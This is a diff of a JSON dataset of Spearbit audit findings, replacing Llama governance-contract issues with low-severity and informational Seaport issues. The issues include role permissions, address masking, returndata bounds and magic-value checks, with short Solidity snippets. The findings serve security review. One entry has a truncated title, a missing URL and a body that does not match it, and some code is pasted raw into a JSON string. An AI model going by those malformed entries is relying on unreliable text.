The likelihood for this to happen is still low, but the implications could be critical.", + "title": "Some address fields are masked even though the ConsiderationDecoder wanted to skip this masking", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When a field of address type from a struct in memory is used, the compiler masks it (also: 2, 3). struct A { address addr; } A memory a; // P is either a statement or a function call // when compiled --> and(mload(a_addr_pos), 0xffffffffffffffffffffffffffffffffffffffff) P(a.addr); Also the compiler is making use of function cleanup_address(value) -> cleaned { cleaned := and(value, 0xffffffffffffffffffffffffffffffffffffffff) } function abi_encode_address(value, pos) { mstore(pos, and(value, 0xffffffffffffffffffffffffffffffffffffffff)) } in a few places", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "The permissionId doesn't include call or delegate-call for LlamaAccount.execute", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "The decision if LlamaAccount.execute is a delegate_call depends on the bool flag parameter withDelegatecall. This parameter is not included in the permissionId, which controls role permissions in Llama. The permissionId in Llama is calculated in the following way: PermissionData memory permission = PermissionData(target, bytes4(data), strategy); bytes32 permissionId = keccak256(abi.encode(permission)); The permissionId required for a role to perform an action only includes the function signature but not the parameters themselves. It is impossible to define the opcode as part of the permissionId.", + "title": "div(x, (1<", + "body": "(na, ns, da, ds) = (na − ε, na + ns − ε, ds, ds) Here ε = (na + ns > ds)(na + ns − ds) is chosen so that the order would not be overfilled. The parameters used in calculating ε are taken before they have been updated. Case 4. ds ≠ 0, da ≠ 1, da ≠ ds: (na, ns, da, ds) = (1/G)(na·ds − ε, na·ds + ns·da − ε, da·ds, da·ds) Here ε = (na·ds + ns·da > da·ds)(na·ds + ns·da − da·ds) is chosen so that the order would not be overfilled. And in case the new values go beyond 120 bits, G = gcd(na·ds − ε, na·ds + ns·da − ε, da·ds); otherwise G will be 1. The parameters used in calculating ε and G are taken before they have been updated. If one of the updated values occupies more than 120 bits, the call will be reverted.", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "LlamaCore doesn't check if minExecutionTime returned by strategy is in the past", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "The minExecutionTime returned by a strategy is not validated.", + "title": "The magic return value checks can be made stricter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The magic return value check for ZoneInteraction can be made stricter. 1. It does not check the lower 28 bytes of the return value. 2. It does not check if extcodesize() of the zone is non-zero. In particular, for the identity precompile, the magic check would pass.
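A sketch of ours (not Seaport's code; names are hypothetical) of a stricter variant that addresses both points:

function callAndCheckMagicStrict(
    address zone,
    bytes memory callData,
    bytes32 magic // expected selector left-aligned, lower 28 bytes zero
) internal returns (bool ok) {
    assembly {
        // (2) reject targets without code, e.g. EOAs and precompiles
        if iszero(extcodesize(zone)) { revert(0, 0) }
        ok := call(gas(), zone, 0, add(callData, 0x20), mload(callData), 0, 0x20)
        // (1) require exactly one word of returndata and compare all 32 bytes,
        // so a callee echoing its calldata (like the identity precompile at
        // address 4) cannot satisfy the check with a selector-prefixed payload
        ok := and(ok, and(eq(returndatasize(), 0x20), eq(mload(0), magic)))
    }
}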
This is, however, a general issue with the pattern where magic values are the same as the function selector, and is not specific to the Zone.", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Address parsing from tokenId to address string does not account for leading 0s", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Policy tokenIds are derived from the holder's account address. The address is intended to be displayed in the svg generated when calling tokenURI. Currently, leading 0s are truncated, rendering an incorrect address string: e.g. 0x015b... vs 0x0000...be60 for address 0x0000000000015B23C7e20b0eA5eBd84c39dCbE60.", + "title": "Resolving additional offer items supplied by contract orders with criteria can be impractical", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Contract orders can supply additional offer amounts when the order is executed. However, if they supply extra offer items with criteria on the fly, the fulfiller won't be able to supply the necessary criteria resolvers (the correct Merkle proofs). This can lead to flaky orders that are impractical to fulfill.", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "The ALL_HOLDERS_ROLE can be set as a force role by mistake", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "During the initialization, an array of roles that must be assigned as force approval/disapproval can be sent. The logic does not account for ALL_HOLDERS_ROLE (which is role id 0, the default value of uint8), which can be sent as a mistake by the user. This is a low issue, as if the above scenario happens, the strategy can become obsolete, which will require the owner to redeploy the strategy with correct initialization configs. We must mention that the force roles cannot be changed after they are set within the initialization.", + "title": "Use of confusing named constant SpentItem_size in a function that deals with only ReceivedItem", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The named constant SpentItem_size is used in the function copyReceivedItemsAsConsiderationItems, even though the context has nothing to do with SpentItem.", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "LlamaPolicy.setRolePermission allows to set permissions for non existing roles", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "It is possible to set a permission for a role that doesn't exist yet. In other functions, like assigning a role to a policyholder, this check happens. (See: LlamaPolicy.sol#L343) A related issue, very close to this, is the updateRoleDescription method, which can emit an event for a role that does not exist.
This is just an informational issue, as it does not affect the on-chain logic in any way; it might affect off-chain logic if any logic ever relies on it.", + "title": "The ABI-decoding of generateOrder returndata does not have sufficient checks to prevent out of bounds returndata reads", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "There was some attempt to avoid out-of-bounds returndata access in the ConsiderationDecoder. However, the two returndatacopy(...) in ConsiderationDecoder.sol#L456-L461 can still lead to out-of-bounds access and therefore may revert. Assume that code reaches the line ConsiderationDecoder.sol#L456. We have the following constraints: 1. returndatasize >= 4 * 32: ConsiderationDecoder.sol#L428 2. offsetOffer <= returndatasize: ConsiderationDecoder.sol#L444 3. offsetConsideration <= returndatasize: ConsiderationDecoder.sol#L445 If we pick a returndata that satisfies 1 and let offsetOffer == offsetConsideration == returndatasize, all the constraints are true. But the returndatacopy would revert due to an out-of-bounds read. Note: high-level Solidity avoids reading from out-of-bounds returndata. This is usually done by checking if returndatasize() is large enough for static data types and always doing returndatacopy of the form returndatacopy(x, 0, returndatasize()).", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "The RoleAssigned event in LlamaPolicy emits the currentRoleSupply instead of the quantity", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "During the audit, the client discovered an issue that affects their off-chain infrastructure. The RoleAssigned event in LlamaPolicy emits the currentRoleSupply instead of the quantity. From an off-chain perspective, there is currently no way to get the quantity assigned for a role to a policyholder at role assignment time. The event would be more useful if it emitted quantity instead of currentRoleSupply (since the latter can just be calculated off-chain from the former).", + "title": "Consider renaming writeBytes to writeBytes32", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The function name writeBytes is not accurate in this context.", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "ETH can remain in the contract if msg.value is greater than expected", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "When an action is created, the creator can specify an amount of ETH that needs to be sent when executing the transaction. This is necessary in order to forward ETH to a target call. Currently, when executing the action, the msg.value is checked to be at least the required amount of ETH needed to be forwarded. if (msg.value < actionInfo.value) revert InsufficientMsgValue(); This can result in ETH remaining in the contract after the execution.
From our point of view, LlamaCore should not hold any balance of ETH.", + "title": "Missing test case for criteria-based contract orders and identifierOrCriteria != 0 case", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The only test case for criteria-based contract orders is in advanced.spec.ts#L434. This tests the case for identifierOrCriteria == 0. Tests for the other case, identifierOrCriteria != 0, are missing.", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Cannot re-authorize an unauthorized strategy config", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Strategies are deployed using a create2 salt. The salt is derived from the strategy config itself (see LlamaCore.sol#L709-L710). This means that any unauthorized strategy cannot be used in the future, even if a user decides to re-enable it.", + "title": "NatSpec comment for conduitKey in bulkTransfer() says \"optional\" instead of \"mandatory\"", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The NatSpec comment says that conduitKey is optional, but there is a check making sure that this value is always supplied.", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Signed messages may not be cancelled", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Creating, approving, and disapproving actions may all be done by signing a message and having another account call the relevant *BySig function. Currently, there is no way for a signed message to be revoked without a successful *BySig function call containing the nonce of the message to be revoked.", + "title": "Comparing the magic values returned by different contracts is inconsistent", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In ZoneInteraction's _callAndCheckStatus we perform the following comparison for the returned magic value: let magic := shr(224, mload(callData)) magicMatch := eq(magic, shr(224, mload(0))) But the returned magic value comparison in _assertValidSignature is done without truncating the returned value: if iszero(eq(mload(0), EIP1271_isValidSignature_selector))", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "LlamaCore name open to squatting or impersonation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "When deploying a LlamaCore clone, the create2 salt is derived from the name. This means that no two may have the same name, and name squatting, or impersonation, may occur.", + "title": "Document the structure of the TypehashDirectory", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Instances of TypehashDirectory would act as storage contracts with runtime bytecode: [0x00 - 0x00] 00 [0x01 - 0x20] h(struct BulkOrder { OrderComponents[2] tree }) [0x21 - 0x40] h(struct BulkOrder { OrderComponents[2][2] tree }) ... [0xNN - 0xMM] h(struct BulkOrder { OrderComponents[2][2]...[2] tree }) h calculates the EIP-712 typeHash of the input struct.
0xMM would be mul(MaxTreeHeight, 0x20) and 0xNN = 0xMM - 0x1f.", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Expired policyholders are active until they are explicitly revoked", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Each policyholder in Llama has an expiration timestamp. However, a policyholder can still use the power of their role after the expiration has passed. The final revoke only happens after the public LlamaPolicy.revokeExpiredRole method is called. Anyone can call this method after the expiration timestamp has passed. For the Llama system to function effectively with role expiration, it is essential that external keepers vigilantly monitor the contract and promptly revoke expired roles. A final revoke exactly at the expiration cannot be guaranteed.", + "title": "Document what twoSubstring encodes", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "We have: bytes32 constant twoSubstring = 0x5B325D0000000000000000000000000000000000000000000000000000000000; which encodes: cast --to-ascii 0x5B325D0000000000000000000000000000000000000000000000000000000000 [2]", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Gas optimizations", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Throughout the codebase we've identified gas improvements that were aggregated into one issue for better management. RelativeStrategy.sol#L159 The if (disapprovalPolicySupply == 0) revert RoleHasZeroSupply(disapprovalRole); check and actionDisapprovalSupply[actionInfo.id] = disapprovalPolicySupply; can be wrapped in an if block in case disapprovals are enabled. The uint128 newNumberOfHolders; and uint128 newTotalQuantity; variables are obsolete, as the updates on the currentRoleSupply can be done in the if branches. LlamaPolicy.sol#L380-L392 The exists check is redundant LlamaPolicy.sol#L252 The _validateActionInfoHash(action.infoHash, actionInfo); is redundant, as it's already done in the getActionState LlamaCore.sol#L292 LlamaCore.sol#L280 LlamaCore.sol#L672 Finding the BOOTSTRAP_ROLE in the LlamaFactory._deploy could happen by expecting the role at a certain position, like position 0, instead of paying gas for an on-chain search operation to iterate the array. LlamaFactory.sol#L205 The quantityDiff calculation is guaranteed not to overflow, as the ternary checks initialQuantity > quantity before subtracting. Infeasible for numberOfHolders and totalQuantity to overflow. See also LlamaPolicy.sol#L422-L423 Infeasible for numberOfHolders to overflow.", + "title": "Upper bits of the to parameter to call opcodes are stripped out by clients", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Upper bits of the to parameter to call opcodes are stripped out by clients.
For example, geth would strip the upper bytes out: instructions.go#L674 uint256.go#L114-L121 So even though the to parameters in this context can have dirty upper bits, the call opcodes can be successful, and masking these values in the contracts is not necessary for this context.", "labels": [ "Spearbit", - "Llama", - "Severity: Gas Optimization" + "Seaport", + "Severity: Informational" ] }, { - "title": "Unused code", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Various parts of the code is unused or unnecessary. CallReverted and MissingAdmin in LlamaPolicy.sol#L27-L29 DisapprovalThresholdNotMet in RelativeStrategy.sol#L28 Unused errors in LlamaCore.sol InvalidCancelation, ProhibitedByActionGuard, ProhibitedByStrategy, ProhibitedByStrategy(bytes32 reason) and RoleHasZeroSupply(uint8 role) /// - Action creators are not allowed to cast approvals or disapprovals on their own actions, The comment is inaccurate, this strategy, the creators have no restrictions on their actions. RelativeStrategy.sol#L19 17", + "title": "Remove unused functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The functions in the above context are not used in the codebase.", "labels": [ "Spearbit", - "Llama", - "Severity: Gas Optimization" + "Seaport", + "Severity: Informational" ] }, { - "title": "Duplicate storage reads and external calls", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "When creating, approving, disapproving, queuing, and executing actions, there are calls between the various contracts in the system. Due to the external calls, the compiler will not cache storage reads, meaning the gas cost of warm sloads is incurred multiple times. The same is true for view function calls between the contracts. A number of these calls are returning the same value multiple times in a transaction.", + "title": "Fulfillment_itemIndex_offset can be used instead of OneWord", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In the above context, one has: // Get the item index using the fulfillment pointer. itemIndex := mload(add(mload(fulfillmentHeadPtr), OneWord))", "labels": [ "Spearbit", - "Llama", - "Severity: Gas Optimization" + "Seaport", + "Severity: Informational" ] }, { - "title": "Consider clones-with-immutable-args", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "The cloned contracts have immutable values that are written to storage on initialization due to proxies being used. Reading from storage costs extra gas but also puts some of the storage values at risk of being overwritten when making delegate calls.", + "title": "Document how the _pauser role is assigned for PausableZoneController", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The _pauser role is an important role for a PausableZoneController. 
It can pause any zone created by this controller and thus transfer all the native token funds locked in that zone to itself.", "labels": [ "Spearbit", - "Llama", - "Severity: Gas Optimization" + "Seaport", + "Severity: Informational" ] }, { - "title": "The domainSeperator may be cached", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "The domainSeperator is computed for each use. Some gas may be saved by using caching and deferring to the cached value.", + "title": "_aggregateValidFulfillmentConsiderationItems's memory layout assumptions depend on _validateOrdersAndPrepareToFulfill's memory manipulation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In _aggregateValidFulfillmentConsiderationItems we are using the ReceivedItem_recipient_offset of considerationItemPtr to write to receivedItem at the same offset (the same offset is also used here): // Set the recipient on the received item. mstore( add(receivedItem, ReceivedItem_recipient_offset), mload(add(considerationItemPtr, ReceivedItem_recipient_offset)) ) This looks buggy, but in _validateOrdersAndPrepareToFulfill(...) we overwrite consideration[i].endAmount with consideration[i].recipient: mstore( add( considerationItem, ReceivedItem_recipient_offset // old endAmount ), mload( add( considerationItem, ConsiderationItem_recipient_offset ) ) ) Also, _validateOrdersAndPrepareToFulfill gets called first in _fulfillAvailableAdvancedOrders and _matchAdvancedOrders. This is important since the memory for the consideration arrays needs to be updated before we reach _aggregateValidFulfillmentConsiderationItems.", "labels": [ "Spearbit", - "Llama", - "Severity: Gas Optimization" + "Seaport", + "Severity: Informational" ] }, { - "title": "Prefer on-chain SVGs or IPFS links over server links for contractURI", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Llama uses on-chain SVG for LlamaPolicy.tokenURI. The same could be implemented for LlamaPolicy.contractURI as well. In general IPFS links or on-chain SVG for visual representations provide better properties than centralized server links.", + "title": "recipient is provided as the fulfiller for the OrderFulfilled event", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In the above context, in general it is not true that the recipient is the fulfiller. 
Also note that recipient is address(0) for match orders.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "Consider making the delegate-call scripts functions only callable by delegate-call", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "An additional safety check could be added to scripts if a function should be only callable via a delegate-call.", + "title": "availableOrders[i] return values need to be explicitly assigned since they live in a region of memory which might have been dirtied before", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Seaport 1.1 did not have the following default assignment: if (advancedOrder.numerator == 0) { availableOrders[i] = false; continue; } But this is needed here since the current memory region which was previously used by the accumulator might be dirty.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "Missing tests for SingleUseScript.sol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "There are no tests for SingleUseScript.sol in Llama.", + "title": "Usage of MemoryPointer / formatting inconsistent in _getGeneratedOrder", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Usage of MemoryPointer / formatting is inconsistent between the loop used for OfferItems and the loop used for ConsiderationItems.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "Role not available to Guards", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Use cases where Guards require knowing the creation or approval role for the action are not sup- ported. ActionInfo does reference the strategy, and the two implemented strategies do have public functions referencing the approvalRole, allowing for a workaround. However, this is not mandated by the ILlamaStrategy interface and is not guaranteed to be present in future strategies.", + "title": "newAmount is not used in _compareItems", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "newAmount is unused in _compareItems. If originalItem points to I = (t, T, i, a_s, a_e) and the newItem to I' = (t', T', i', a'_s, a'_e), where t and t' are the itemType (t taken for I after the adjustment for restricted collection items), T and T' the token, i and i' the identifierOrCriteria (i taken for I after the adjustment for restricted collection items), a_s and a'_s the startAmount, a_e and a'_e the endAmount, and c denotes _compareItems, then we have c(I, I') = (t != t') OR (T != T') OR (i != i') OR (a_s != a_e), and so we are not comparing either a_s to a'_s or a'_s to a'_e. 
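A plain-Solidity sketch of the predicate just described (an illustrative rewrite on our part, not the assembly in _compareItems; parameter names are ours):
function compareItems(
    uint8 t, address T, uint256 i, uint256 aS, uint256 aE,    // original item (after adjustment)
    uint8 t_, address T_, uint256 i_, uint256 aS_, uint256 aE_ // new item
) internal pure returns (bool mismatch) {
    // aS_ and aE_ are deliberately ignored: the new item's amounts never enter the comparison
    mismatch = (t != t_) || (T != T_) || (i != i_) || (aS != aE);
}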
In abi_decode_generateOrder_returndata a'_s = a'_e is enforced. In _getGeneratedOrder we have the following check: a_s > a'_s (an invalid case for offer items that contributes to errorBuffer; the inequality is reversed for consideration items). And so in each loop (t != t') OR (T != T') OR (i != i') OR (a_s != a_e) OR (a_s > a'_s) is ORed into errorBuffer.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "Global guards are not supported", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Other protocols use of guards applies them to the account (i.e. globally). In other words, if global guards existed and if there are some properties you know to apply to the entire LlamaCore instance a global guard could be applied. The current implementation allows granular control, but it also requires granular control with no ability to set global guards.", + "title": "reformat validate so that its body is consistent with the other external functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "For consistency with other functions we can rewrite validate as: function validate( Order[] calldata /* orders */ ) external override returns (bool /* validated */ ) { return _validate(to_dyn_array_Order_ReturnType( abi_decode_dyn_array_Order )(CalldataStart.pptr())); } It needs to be checked whether this changes code size or gas cost. Seaport: Fixed in PR 824. Spearbit: Verified.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "Consider using _disableInitializers in constructor", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "OpenZeppelin added the _disableInitializers() in 4.6.0 which prevents initialization of the im- plementation contract and recommends its use.", + "title": "Add commented parameter names (Type Location /* name */)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Add commented parameter names (Type Location /* name */) for validate: Order[] calldata /* orders */ Seaport: Fixed in commit 74de34. Spearbit: Verified.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "Revoking and setting a role edge cases", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "This issue highlights a number of edge-case behaviors 1. Calling setRoleHolder passing in an account with balanceOf == 0, 0 quantity, and 0 expiration results in minting the NFT. 2. Revoking all policies through revokeExpiredRole leaves an address with no roles except for the ALL_- HOLDERS_ROLE and a balanceOf == 1. 3. Revoking may be conducted on policies the address does not have (building on the previous scenario): Alice is given role 1 with expiry. Expiry passes. Anyone calls revokeExpiredRole. Role is revoked but Alice still has balanceOf == 1. LlamaCore later calls revokePolicy with roles array of [2]. A role Alice never had is revoked. The NFT is burned.", + "title": "Document that the height provided to _lookupBulkOrderTypehash can only be in a certain range", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "We need the height h provided to _lookupBulkOrderTypehash to satisfy: 1 + 32(h - 1) ∈ [0, min(0xffffffffffffffff, typeDirectory.codesize) - 32] Otherwise typeHash := mload(0) would be 0 or would be padded by zeros. 
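As a worked example (using the directory layout documented earlier, whose runtime code size is 1 + 32 * MaxTreeHeight bytes): the largest valid height h = MaxTreeHeight gives typeHashOffset = 1 + 32(h - 1) = codesize - 32, i.e. exactly the last full word of the runtime code, while any larger h would start reading past the end of the code.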
When extcodecopy gets executed extcodecopy(directory, 0, typeHashOffset, 0x20) clients like geth clamp typeHashOffset to the minimum of 0xffffffff_ffffffff and directory.codesize and pad the result with 0s if it is out of range. ref: instructions.go#L373 common.go#L54", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "Use built in string.concat", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "The solidity version used has a built-in string.concat which can replace the instances of string(abi.encodePacked(...). The client notes there are no gas implications of this change while the change does offer semantic clarity.", + "title": "Unused imports can be removed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The imported contents in this context are unused.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "Inconsistencies", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Throughout the codebase, we've encountered some inconsistencies that we decided to point out. for(uint256 i = 0... is not used everywhere e.g. AbsoluteStrategy.sol#L130 Sometimes, a returned value is not named. e.g. named return value function createAction( uint8 role, ILlamaStrategy strategy, address target, uint256 value, bytes calldata data, string memory description ) external returns (uint256 actionId) { unnamed return value function createActionBySig( uint8 role, ILlamaStrategy strategy, address target, uint256 value, bytes calldata data, address policyholder, uint8 v, bytes32 r, bytes32 s ) external returns (uint256) { Missing NatSpec on various functions. e.g. LlamaPolicy.sol#L102 _uncheckedIncrement is not used everywhere. Naming of modifiers In all contracts the onlyLlama modfiier only refers to the llamaCore. The only exception is LlamaPolicyMetadataParamRegistry which has the same name but refers to llamaCore and rootLlama but is called onlyLlama. See LlamaPolicyMetadataParamRegistry.sol#L16 Console.log debug output in RelativeStrategy console.log in RelativeStrategy See: RelativeStrat- egy.sol#L215 In GovernanceScript.sol both of SetRolePermission and SetRoleHolder mirror structs defined in the shared lib/Structs.sol file. Additionally, some contracts declare their own structs over inheriting all structs from lib/Structs.sol: LlamaAccount GovernanceScript LlamaPolicy Recommend removing duplicate structs and, where relevant, continue making use of the shared Structs.sol for struct definitions.", + "title": "msg.sender is provided as the fulfiller input parameter in a few locations", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "msg.sender is provided as the fulfiller input parameter.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "Policyholders with large quantities may not both create and exercise their large quantity for the same action", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "The AbsoluteStrategy removes the action creator from the set of policyholders who may approve / disapprove an action. This is a departure from how the RelativeStrategy handles action creators. 
Not permitting action creators to approve / disapprove is simple to reason about when each policyholder has a quantity of 1; creating can even be thought of an implicit approval and may be factored in when choosing a minApprovals value. However, in scenarios where a policyholder has a large quantity (in effect a large weight to their casted approval), creating an action means they forfeit the use of the vast majority of their quantity for that particular action.", + "title": "Differences and similarities of ConsiderationDecoder and solc when decoding dynamic arrays of static/fixed base struct type", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The way OfferItem[] in abi_decode_dyn_array_OfferItem and ConsiderationItem[] in abi_decode_dyn_array_ConsiderationItem are decoded is consistent with solc regarding this: For dynamic arrays of static/fixed base struct type, the memory region looks like: [mPtrLength : mPtrLength + 0x20) arrLength [mPtrLength + 0x20 : mPtrLength + 0x40) memberTail1 - a memory pointer to the array's 1st element ... [mPtrLength + ... : mPtrLength + ...) memberTailN - a memory pointer to the array's Nth element [memberTail1 : memberTail1 + elementSize) element1 ... [memberTailN : memberTailN + elementSize) elementN (where elementSize is the fixed byte size of the base struct, e.g. OfferItem_size). The difference is that solc decodes and validates (checking dirty bytes) each field of the elements of the array (which are static struct types) separately (one calldataload and validation per field per element). ConsiderationDecoder skips all those validations for both OfferItems[] and ConsiderationItems[] by copying a chunk of calldata to memory (the tail parts): calldatacopy( mPtrTail, add(cdPtrLength, 0x20), mul(arrLength, OfferItem_size) ) That means for OfferItem[], itemType and token (and also recipient for ConsiderationItem[]) fields can potentially have dirty bytes.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "The roleBalanceCheckpoints can run out of gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "The roleBalanceCheckpoints function returns the Checkpoints history of a balance. This check will copy into memory the whole history which can end up in a out of gas error. This is an informational issue as this function was designed for off-chain usage and the caller can use eth_call with a higher gas limit.", + "title": "PointerLibraries's malloc skips some checks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "malloc in PointerLibraries skips checking if add(mPtr, size) is OOR or wraps around. 
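For intuition, a minimal sketch of an unchecked bump allocator of this shape (illustrative, not the verbatim PointerLibraries code; the return is a raw uint256 pointer for simplicity):
function malloc(uint256 size) internal pure returns (uint256 mPtr) {
    assembly {
        mPtr := mload(0x40)
        // no check that add(mPtr, size) stays below 0xffffffffffffffff or does not wrap
        mstore(0x40, add(mPtr, size))
    }
}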
